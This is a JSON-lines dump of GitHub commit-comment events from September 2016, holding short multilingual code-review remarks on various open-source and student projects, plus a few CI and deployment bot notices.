{"id":"4527661044","type":"CommitCommentEvent","actor":{"login":"bomu-bomu"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18928330,"position":345,"line":345,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T13:35:35Z","updated_at":"2016-09-07T13:35:35Z","body":" อันนี้เป็น ท่าปกติของ JS ?? "}},"created_at":"2016-09-07T13:35:35Z"}
{"id":"4527661553","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928333,"position":10,"line":10,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:35:41Z","updated_at":"2016-09-07T13:35:41Z","body":"En este caso conviene usar siempre la primitiva double. "}},"created_at":"2016-09-07T13:35:41Z"}
{"id":"4527663312","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928339,"position":10,"line":38,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:35:59Z","updated_at":"2016-09-07T13:35:59Z","body":"si usas cosas solo para debug, utilizar directiva de debug (#define DEBUG) "}},"created_at":"2016-09-07T13:35:59Z"}
{"id":"4527664377","type":"CommitCommentEvent","actor":{"login":"ignaciogc"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928341,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:36:11Z","updated_at":"2016-09-07T13:36:11Z","body":"The LIMIT is set to 0,1 - We are only grabbing one pokémon with that query.\r\nThe \"WHERE\" condition that was removed only discards a very small subset, if the query was grabbing ALL, the original query would kill the server anyways."}},"created_at":"2016-09-07T13:36:11Z"}
{"id":"4527665884","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18928347,"position":null,"line":null,"path":null,"commit_id":"f0e7b45bcbcc5b979d9d8df9d151f5951996e6e9","created_at":"2016-09-07T13:36:26Z","updated_at":"2016-09-07T13:36:26Z","body":"The addition of the comma operator broke OS X 10.5 with GCC 4.0, Cent OS 5 with GCC 4.1, and Ubuntu 12 with GCC 4.6. The break occurred on Debug builds only (`-O0`), and was not present in Release builds (`-O2` and above).\r\n\r\nAlso see [Issue 255: OS X 10.5 and Missing symbols for FixedKeyLength<params>::KEYLENGTH](https://github.com/weidai11/cryptopp/issues/255)."}},"created_at":"2016-09-07T13:36:26Z"}
{"id":"4527666336","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928348,"position":45,"line":97,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:36:31Z","updated_at":"2016-09-07T13:36:31Z","body":"utilizar std::endl; por simplicidad y standarizacion"}},"created_at":"2016-09-07T13:36:31Z"}
{"id":"4527667289","type":"CommitCommentEvent","actor":{"login":"bomu-bomu"},"repo":{"name":"bomu-bomu/WebFrontEndDemo"},"payload":{"comment":{"id":18928351,"position":289,"line":289,"path":"react/react_include.js","commit_id":"03115adb40e2d1bf4286d01009804e4c31f0be76","created_at":"2016-09-07T13:36:41Z","updated_at":"2016-09-07T13:36:41Z","body":"เรียกโดย JSX ตัวนอก  ลงเทสวิธี  share Modal ดู "}},"created_at":"2016-09-07T13:36:41Z"}
{"id":"4527667326","type":"CommitCommentEvent","actor":{"login":"senthil10"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928352,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:36:41Z","updated_at":"2016-09-07T13:36:41Z","body":"![image](https://cloud.githubusercontent.com/assets/5311007/18313850/dbec8f08-7510-11e6-987c-059a731378e0.png)\r\n"}},"created_at":"2016-09-07T13:36:41Z"}
{"id":"4527668942","type":"CommitCommentEvent","actor":{"login":"christingruber"},"repo":{"name":"touchdesign/prestashop-sofortbanking"},"payload":{"comment":{"id":18928358,"position":8,"line":80,"path":"validation.php","commit_id":"47888f4fc7d21a01cdca041ccee00333dcea2d9c","created_at":"2016-09-07T13:36:58Z","updated_at":"2016-09-07T13:36:58Z","body":"Did you mean on change order status only? It's not necessary... The cart/order data is not relevant and can't changed in this situation."}},"created_at":"2016-09-07T13:36:58Z"}
{"id":"4527670636","type":"CommitCommentEvent","actor":{"login":"earthquakesan"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18928365,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-07T13:37:15Z","updated_at":"2016-09-07T13:37:15Z","body":"@gmouchakis it will cause problems, because jdbc driver is required to connect to the hive server. How did you start the beeline client?"}},"created_at":"2016-09-07T13:37:15Z"}
{"id":"4527673584","type":"CommitCommentEvent","actor":{"login":"ewels"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928376,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:37:45Z","updated_at":"2016-09-07T13:37:45Z","body":"![javascript](http://qlikshare.com/wp-content/uploads/2016/03/jsvsjava.jpg)"}},"created_at":"2016-09-07T13:37:45Z"}
{"id":"4527673833","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928378,"position":26,"line":26,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:37:47Z","updated_at":"2016-09-07T13:37:47Z","body":"El valor por defecto para todos los doubles es 0.0, no hace falta inicializarlos."}},"created_at":"2016-09-07T13:37:47Z"}
{"id":"4527673852","type":"CommitCommentEvent","actor":{"login":"benjamingr"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":18928379,"position":4,"line":4270,"path":"easylist/easylist_specific_block.txt","commit_id":"bcf690e9811f9023deb343ab470c713769264b50","created_at":"2016-09-07T13:37:47Z","updated_at":"2016-09-07T13:37:47Z","body":"Awesome, thanks!\r\n\r\nI couldn't reply in the EasyList forums (it's claiming I need to fill a ReCaptcha that's not there) but I just wanted to thank you for the quick response. Let me know if there is anything else you need from our side to make your job easier."}},"created_at":"2016-09-07T13:37:47Z"}
{"id":"4527674418","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"apple/swift-llvm"},"payload":{"comment":{"id":18928381,"position":5,"line":69,"path":"utils/lit/lit/run.py","commit_id":"46c90ef22b18a32ad914cf1a4b71dc54595d44e5","created_at":"2016-09-07T13:37:53Z","updated_at":"2016-09-07T13:37:53Z","body":"I was thinking to replace their 'display' parameter with a simple wrapper that has that function... I think it should work out to a smaller diff actually."}},"created_at":"2016-09-07T13:37:53Z"}
{"id":"4527675445","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928384,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:38:06Z","updated_at":"2016-09-07T13:38:06Z","body":"https://i.imgur.com/jN6APF4.png\r\n\r\nOk so there is the triangle."}},"created_at":"2016-09-07T13:38:06Z"}
{"id":"4527678898","type":"CommitCommentEvent","actor":{"login":"dkochmanski"},"repo":{"name":"sjl/cl-nrepl"},"payload":{"comment":{"id":18928391,"position":null,"line":null,"path":null,"commit_id":"31d7af53acdee4d6ffc4abfa9e56437bdb33d685","created_at":"2016-09-07T13:38:42Z","updated_at":"2016-09-07T13:38:42Z","body":"Hey, you may be interested in this portability layer with fetching the lambda lists:\r\n\r\n https://github.com/Shinmera/trivial-arguments"}},"created_at":"2016-09-07T13:38:42Z"}
{"id":"4527679010","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928392,"position":70,"line":70,"path":"sdlAdventures/Vector2D.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:38:44Z","updated_at":"2016-09-07T13:38:44Z","body":"acá el programa debería tener un assert si  scalar <= float::epsilon o scalar >= -float::epsilon. Para evitar la division por cero. El programa debería detenerse en este caso."}},"created_at":"2016-09-07T13:38:44Z"}
{"id":"4527679591","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928393,"position":73,"line":73,"path":"sdlAdventures/Vector2D.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:38:50Z","updated_at":"2016-09-07T13:38:50Z","body":"idem arriba"}},"created_at":"2016-09-07T13:38:50Z"}
{"id":"4527679938","type":"CommitCommentEvent","actor":{"login":"NivShalmon"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":18928395,"position":null,"line":null,"path":null,"commit_id":"a87ef18d2fd0dfeb4f4a225780eb7d016135ee63","created_at":"2016-09-07T13:38:54Z","updated_at":"2016-09-07T13:38:54Z","body":"This is about issue #119, mistyped the issue's number"}},"created_at":"2016-09-07T13:38:54Z"}
{"id":"4527680531","type":"CommitCommentEvent","actor":{"login":"56k-amaury"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928396,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:39:01Z","updated_at":"2016-09-07T13:39:01Z","body":"More subset = more loading = less performance :-) \r\nJust adding the 15 minutes in SQL add you keep the same performances :-) "}},"created_at":"2016-09-07T13:39:01Z"}
{"id":"4527682468","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18928398,"position":6,"line":30,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-07T13:39:21Z","updated_at":"2016-09-07T13:39:21Z","body":"You're not closing this archive anywhere. Note that zipfile also supports context managers via the `with` statement. Perhaps that's a better idea."}},"created_at":"2016-09-07T13:39:21Z"}
{"id":"4527683684","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928400,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:39:33Z","updated_at":"2016-09-07T13:39:33Z","body":"Deleting all those gsm icons results in this which isn't much better.\r\n\r\n\r\nhttps://i.imgur.com/xWRmqZL.png"}},"created_at":"2016-09-07T13:39:33Z"}
{"id":"4527684115","type":"CommitCommentEvent","actor":{"login":"marksantcroos"},"repo":{"name":"radical-cybertools/radical.pilot"},"payload":{"comment":{"id":18928401,"position":null,"line":null,"path":null,"commit_id":"c24a7cc0814b5c47f3b334cf38c609cc4e1c2d6f","created_at":"2016-09-07T13:39:37Z","updated_at":"2016-09-07T13:39:37Z","body":"Never mind, I think I confused matters a bit ...\r\n\r\nI have these two commits:\r\nhttps://github.com/radical-cybertools/radical.pilot/commit/0fc9990c9c3f50d8f590aecbd12c2fe098833bbc\r\nand\r\nhttps://github.com/radical-cybertools/radical.pilot/commit/531e983cc8d2234f5512ba138078e2ba8d6cfa58\r\n\r\nWhich looks awfully similar in hindsight, next time I will look at my code before I shout :)"}},"created_at":"2016-09-07T13:39:37Z"}
{"id":"4527687146","type":"CommitCommentEvent","actor":{"login":"DCooksey"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":18928406,"position":null,"line":null,"path":null,"commit_id":"0b4365c6b8ff2196426ff960ca0944881fe2ba90","created_at":"2016-09-07T13:40:10Z","updated_at":"2016-09-07T13:40:10Z","body":"Websockets in relation to the chat."}},"created_at":"2016-09-07T13:40:10Z"}
{"id":"4527687397","type":"CommitCommentEvent","actor":{"login":"dignifiedquire"},"repo":{"name":"libp2p/js-libp2p-swarm"},"payload":{"comment":{"id":18928409,"position":null,"line":null,"path":null,"commit_id":"0f41df1d6fda0bf3d1a38d9408333a43f5526ec5","created_at":"2016-09-07T13:40:13Z","updated_at":"2016-09-07T13:40:13Z","body":"This commit message, and the changes do not fit together :)"}},"created_at":"2016-09-07T13:40:13Z"}
{"id":"4527687725","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928410,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:40:15Z","updated_at":"2016-09-07T13:40:15Z","body":"So there are actually 3 icons which are overlayed? How stupid is that???"}},"created_at":"2016-09-07T13:40:15Z"}
{"id":"4527690292","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18928415,"position":null,"line":null,"path":null,"commit_id":"b1c1c5d344f1fcdbadd71eab451a44001c315cb0","created_at":"2016-09-07T13:40:38Z","updated_at":"2016-09-07T13:40:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 960](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12885&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:42"}},"created_at":"2016-09-07T13:40:38Z"}
{"id":"4527692341","type":"CommitCommentEvent","actor":{"login":"scottfisk"},"repo":{"name":"django-json-api/django-rest-framework-json-api"},"payload":{"comment":{"id":18928418,"position":91,"line":213,"path":"rest_framework_json_api/renderers.py","commit_id":"0aedffb88fc7009f95e8ca35ec65a4e594d6c685","created_at":"2016-09-07T13:40:58Z","updated_at":"2016-09-07T13:40:58Z","body":"@jarekwg Can you try reverting this change and see if it fixes the issue. I don't have time to look further at the moment, but I am wondering if `relation_type` overriding here is the issue."}},"created_at":"2016-09-07T13:40:58Z"}
{"id":"4527694112","type":"CommitCommentEvent","actor":{"login":"fetzerms"},"repo":{"name":"OpenTOSCA/container"},"payload":{"comment":{"id":18928425,"position":null,"line":null,"path":null,"commit_id":"b178ca0f88ae64ddeb1f73c30e5d5a6bc8213f76","created_at":"2016-09-07T13:41:16Z","updated_at":"2016-09-07T13:41:16Z","body":"This seems like a dirty hack. What if the messageID has surrounding whitespace? Or is this not possible to happen?\r\n\r\nNote: If i got that right you are currently searching for:\r\n\r\n....>mymessageid<.....\r\n\r\nIs there a predefined format for the messageID such as:\r\n<messageID>mymessageid</messageID> ?\r\n\r\nIf yes, you might extract the messageId and trim it, prior to comparing it."}},"created_at":"2016-09-07T13:41:16Z"}
{"id":"4527694261","type":"CommitCommentEvent","actor":{"login":"senthil10"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928426,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:41:17Z","updated_at":"2016-09-07T13:41:17Z","body":"So they are completely two different things ehh 😂 "}},"created_at":"2016-09-07T13:41:17Z"}
{"id":"4527696779","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"debop/hibernate-redis"},"payload":{"comment":{"id":18928430,"position":16,"line":25,"path":"hibernate-redis/build.gradle","commit_id":"6f7aaa0e04980f4667b5b0a24bd309167887aaf7","created_at":"2016-09-07T13:41:41Z","updated_at":"2016-09-07T13:41:41Z","body":"not sure you should be adding logback to the shaded jar, that should be application specific, keeping slf4j is ok as that is a logging facade."}},"created_at":"2016-09-07T13:41:41Z"}
{"id":"4527697529","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18928433,"position":25,"line":25,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T13:41:49Z","updated_at":"2016-09-07T13:41:49Z","body":"Si vas a usar nroCuenta como identificador de la clase Cuenta, podrías usar la función randomUUID() de UUID (https://docs.oracle.com/javase/7/docs/api/java/util/UUID.html). "}},"created_at":"2016-09-07T13:41:49Z"}
{"id":"4527697709","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928434,"position":16,"line":19,"path":"sdlAdventures/Game.h","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:41:51Z","updated_at":"2016-09-07T13:41:51Z","body":"utilizar nullptr"}},"created_at":"2016-09-07T13:41:51Z"}
{"id":"4527698515","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18928439,"position":null,"line":null,"path":null,"commit_id":"a34a850a8491cc442d4e429153621f1b1758a9be","created_at":"2016-09-07T13:41:59Z","updated_at":"2016-09-07T13:41:59Z","body":"![2016-09-07_211818](https://cloud.githubusercontent.com/assets/8469304/18314020/ddb0f79c-7543-11e6-81a8-bd6144bf7068.png)\r\n"}},"created_at":"2016-09-07T13:41:59Z"}
{"id":"4527700867","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"manjaro/pamac"},"payload":{"comment":{"id":18928443,"position":null,"line":null,"path":null,"commit_id":"71be416317d3f0cc1fbaf3a74345f2b43e2a9525","created_at":"2016-09-07T13:42:24Z","updated_at":"2016-09-07T13:42:24Z","body":"Thanks, that should fix the issue as both should now be available (in E's list).\r\nAs soon as I get a chance I'll test this."}},"created_at":"2016-09-07T13:42:24Z"}
{"id":"4527701674","type":"CommitCommentEvent","actor":{"login":"jason-neal"},"repo":{"name":"jason-neal/Spectrum"},"payload":{"comment":{"id":18928444,"position":null,"line":null,"path":null,"commit_id":"404df06628ae9606bf6b597184528fe403cb15bc","created_at":"2016-09-07T13:42:32Z","updated_at":"2016-09-07T13:42:32Z","body":"No special reason. In the past I know I have specified the pixel position with `range(1024)` but I should just change that habit to `np.arange(1024)`.\r\n\r\nIts not something used specifically for testing, but it could be tested. At this stage I will turn them all to arrays. "}},"created_at":"2016-09-07T13:42:32Z"}
{"id":"4527702016","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18928446,"position":null,"line":null,"path":null,"commit_id":"3e0740b77c33cb0b4ec67e078f3532a21690771c","created_at":"2016-09-07T13:42:36Z","updated_at":"2016-09-07T13:42:36Z","body":"![2016-09-07_211844](https://cloud.githubusercontent.com/assets/8469304/18314033/f3cbd8e4-7543-11e6-89fe-2947cc5f68e7.png)\r\n"}},"created_at":"2016-09-07T13:42:36Z"}
{"id":"4527708387","type":"CommitCommentEvent","actor":{"login":"boatmon0"},"repo":{"name":"crystal-lang/crystal-sqlite3"},"payload":{"comment":{"id":18928465,"position":null,"line":null,"path":null,"commit_id":"0396d637716428c066c9a7b7a413a0b31b635f71","created_at":"2016-09-07T13:43:38Z","updated_at":"2016-09-07T13:43:38Z","body":"Fantastic asterite!  Thanks, I'm all good.  I thought I had done that, changed the version in my shard file for sqlite3 and did a update, but I must have done something wrong."}},"created_at":"2016-09-07T13:43:38Z"}
{"id":"4527708603","type":"CommitCommentEvent","actor":{"login":"ewels"},"repo":{"name":"NationalGenomicsInfrastructure/NGI_dashboards"},"payload":{"comment":{"id":18928467,"position":5,"line":140,"path":"make_dashboards/templates/external/js/dashboard.js","commit_id":"850c475ff4ac7268b9d5ebbd42cde990bb551608","created_at":"2016-09-07T13:43:40Z","updated_at":"2016-09-07T13:43:40Z","body":"(JavaScript == JScript == ECMAScript) ≠ Java\r\n\r\n[Explanation here](http://stackoverflow.com/questions/2018731/why-is-javascript-called-javascript-since-it-has-nothing-to-do-with-java).."}},"created_at":"2016-09-07T13:43:40Z"}
{"id":"4527710694","type":"CommitCommentEvent","actor":{"login":"3TUSK"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18928473,"position":30,"line":30,"path":"src/main/kotlin/me/exz/omniocular/OculusCordis.kt","commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T13:44:00Z","updated_at":"2016-09-07T13:44:00Z","body":"Well, my todo list is mixture of all my school stuff, my personal rpojects and all kinds of \"translation vigilantism\" thingy, so on and so forth..."}},"created_at":"2016-09-07T13:44:00Z"}
{"id":"4527713939","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928480,"position":2,"line":7,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:44:34Z","updated_at":"2016-09-07T13:44:34Z","body":"En el destructor le falta liberar la memoria de:\r\nm_pRenderer;\r\nm_pWindow;\r\ns_pInstance;"}},"created_at":"2016-09-07T13:44:34Z"}
{"id":"4527714804","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":18928484,"position":4,"line":9,"path":"sdlAdventures/Game.cpp","commit_id":"69fbaba493eab76f82b9453cf43f83bec50c95da","created_at":"2016-09-07T13:44:43Z","updated_at":"2016-09-07T13:44:43Z","body":"usar nullptr"}},"created_at":"2016-09-07T13:44:43Z"}
{"id":"4527715923","type":"CommitCommentEvent","actor":{"login":"davidiamyou"},"repo":{"name":"davidiamyou/go-companion"},"payload":{"comment":{"id":18928487,"position":16,"line":16,"path":"express/express.go","commit_id":"53e696d30d8fef532a16118b19a6593a27fb9406","created_at":"2016-09-07T13:44:54Z","updated_at":"2016-09-07T13:44:54Z","body":"What I liked more is the variadic map constructor which requires an even number of arguments. That I learned from ObjectiveC's Dictionary constructor. The main purpose is to allow declarative construction, my other project needs a great amount of nested data declaration in test cases."}},"created_at":"2016-09-07T13:44:54Z"}
{"id":"4527716658","type":"CommitCommentEvent","actor":{"login":"stereodenis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18928490,"position":null,"line":null,"path":null,"commit_id":"3a3ecc40d50b90a2a4dfe5a44f418d16ea942a50","created_at":"2016-09-07T13:45:01Z","updated_at":"2016-09-07T13:45:01Z","body":"👍 "}},"created_at":"2016-09-07T13:45:01Z"}
{"id":"4527723221","type":"CommitCommentEvent","actor":{"login":"h-2"},"repo":{"name":"joergi-w/seqan"},"payload":{"comment":{"id":18928505,"position":6,"line":205,"path":"tests/graph_msa/test_graph_tcoffee.h","commit_id":"29912818f1783be391757b24c107492680d2c615","created_at":"2016-09-07T13:46:09Z","updated_at":"2016-09-07T13:46:09Z","body":"Is this debugging code or what is its purpose?"}},"created_at":"2016-09-07T13:46:09Z"}
{"id":"4527727826","type":"CommitCommentEvent","actor":{"login":"wa4557"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18928524,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T13:46:55Z","updated_at":"2016-09-07T13:46:55Z","body":"What happens if you use `ubuntu-mono-dark`? There `gsm-3g-` isn't empty neither\r\n\r\nOk so from my point of view that's a bug in `network-manager`. Overlaying `gsm-3g` with `nm-tech-*` would make at least a little bit sense. However,  overlaying `nm-signal` `nm-tech` and `gsm-3g` is not only unnecessary but obviously creates breakage.  I'm going to report that somewhere"}},"created_at":"2016-09-07T13:46:55Z"}
{"id":"4527729363","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18928529,"position":null,"line":null,"path":null,"commit_id":"aab7876a8f8aff54867a4b708e39551e5f9897ea","created_at":"2016-09-07T13:47:12Z","updated_at":"2016-09-07T13:47:12Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.html)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/04-extend.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.md)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/05-plugins.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-plugins.md)\n- [source/docs/_terminuspages/06-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/07-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/07-versions.md)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/assets/css/main.css)\n"}},"created_at":"2016-09-07T13:47:12Z"}
{"id":"4527729553","type":"CommitCommentEvent","actor":{"login":"mariamkaraki"},"repo":{"name":"mariamkaraki/hello-world"},"payload":{"comment":{"id":18928530,"position":null,"line":null,"path":null,"commit_id":"cf0bd1e0b832eeb1890488c8bd7a608909b5b9e4","created_at":"2016-09-07T13:47:13Z","updated_at":"2016-09-07T13:47:13Z","body":"great\r\n"}},"created_at":"2016-09-07T13:47:13Z"}
{"id":"4527731224","type":"CommitCommentEvent","actor":{"login":"microbash"},"repo":{"name":"sailorproject/sailor"},"payload":{"comment":{"id":18928533,"position":null,"line":null,"path":null,"commit_id":"86b8d87b5f0fc34332428344ec07145f714503fb","created_at":"2016-09-07T13:47:29Z","updated_at":"2016-09-07T13:47:29Z","body":"This path doesn't close the problem with nginx path.\r\nBecause sailor.path = lfs.currentdir() will be equal default nginx config dir, not the application dir.\r\nI have tested with my application located in the /usr/local/www/app and addresses by http://example.com/\r\n(without index.lua). And the framework searched themes dir in the /usr/local/etc/nginx/themes not in the /usr/local/www/app/themes. But when I did set sailor.path = \"/usr/local/www/app\" All did work right.\r\nSo I think It should be application path variable in the conf.lua to get not from a url. \r\n"}},"created_at":"2016-09-07T13:47:29Z"}
{"id":"4527735807","type":"CommitCommentEvent","actor":{"login":"netexpertise"},"repo":{"name":"dnsmichi/manubulon-snmp"},"payload":{"comment":{"id":18928551,"position":null,"line":null,"path":null,"commit_id":"abc20d874ab50a6bd80034bec47005dff2921abc","created_at":"2016-09-07T13:48:16Z","updated_at":"2016-09-07T13:48:16Z","body":"I don't think this is correct. It will always return false since \"v6.0.1\" is always greater than any number, (stringwise). lt \"v4\" would be more appropriate if I may...\r\n\r\nDave\r\n"}},"created_at":"2016-09-07T13:48:16Z"}
{"id":"4527736014","type":"CommitCommentEvent","actor":{"login":"NatalliaK"},"repo":{"name":"NatalliaK/b-sh-2016"},"payload":{"comment":{"id":18928552,"position":null,"line":null,"path":null,"commit_id":"f4c49a067bef36e72d659a0ec1216dd94b6352ae","created_at":"2016-09-07T13:48:17Z","updated_at":"2016-09-07T13:48:17Z","body":"Привет"}},"created_at":"2016-09-07T13:48:17Z"}
{"id":"4527740077","type":"CommitCommentEvent","actor":{"login":"ignaciogc"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":18928561,"position":null,"line":null,"path":null,"commit_id":"ece304984046d159dc6a6970ae4f3d7a03be70da","created_at":"2016-09-07T13:48:56Z","updated_at":"2016-09-07T13:48:56Z","body":"But the original query to get the 12 recent spawns does NOT have that condition: \r\n\r\n`$req = \"SELECT DISTINCT pokemon_id, disappear_time FROM pokemon ORDER BY disappear_time DESC LIMIT 0,12\";`\r\n\r\nThat is from the current code. It does not filter by disappear_time. Not sure why you decided to filter when updating the list.\r\n\r\nYou say that adding the 15 minutes in SQL will help the performance... maybe ... but the current code does not do the 15 minutes in the SQL, it just grabs ALL pokemon older than the time_interval.\r\n\r\nFor brusselopole.be, this line `AND disappear_time < (NOW() \".$time->symbol_reverse.\" INTERVAL \".$time->delay.\" HOUR)` is basically this `AND disappear_time < (NOW() + INTERVAL 2 HOUR)` = ALL pokemon that disappeared MORE than 2 hours ago = almost all pokemon on your DB\r\n\r\nMaybe I'm missing something, maybe you guys clean your DB every couple 